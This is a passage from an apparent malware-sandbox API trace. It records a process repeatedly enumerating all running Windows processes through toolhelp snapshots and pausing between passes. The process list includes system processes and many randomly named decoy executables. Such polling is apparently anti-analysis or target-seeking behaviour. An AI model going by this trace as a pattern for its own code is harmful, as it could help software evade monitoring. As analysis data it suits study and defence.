lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0141.403] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0141.403] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0141.404] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0141.404] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0141.405] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0141.405] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0141.406] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0141.406] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0141.407] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0141.408] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0141.408] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0141.409] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0141.409] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.410] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0141.410] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.411] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0141.411] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.412] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0141.412] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0141.413] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0141.413] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0141.414] CloseHandle (hObject=0x7a8) returned 1 [0141.414] Sleep (dwMilliseconds=0x64) [0141.516] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7a8 [0141.520] Process32First (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0141.520] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0141.521] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0141.521] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0141.522] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0141.522] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0141.523] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0141.523] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0141.524] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0141.524] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0141.525] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.525] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.526] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.526] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.527] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.527] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0141.528] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.528] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.529] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0141.529] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0141.530] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0141.530] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.531] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0141.531] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0141.541] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0141.542] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0141.542] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0141.542] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0141.543] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0141.543] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0141.544] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0141.545] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0141.545] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0141.545] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0141.546] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0141.546] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0141.547] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0141.548] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0141.548] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0141.549] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0141.549] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0141.550] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0141.550] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0141.551] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0141.551] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0141.551] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.552] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0141.552] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.553] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0141.553] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.554] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0141.554] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0141.555] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0141.555] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0141.556] CloseHandle (hObject=0x7a8) returned 1 [0141.556] Sleep (dwMilliseconds=0x64) [0141.657] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7a8 [0141.660] Process32First (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0141.660] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0141.661] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0141.662] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0141.662] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0141.663] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0141.663] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0141.664] Process32Next (in: hSnapshot=0x7a8, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 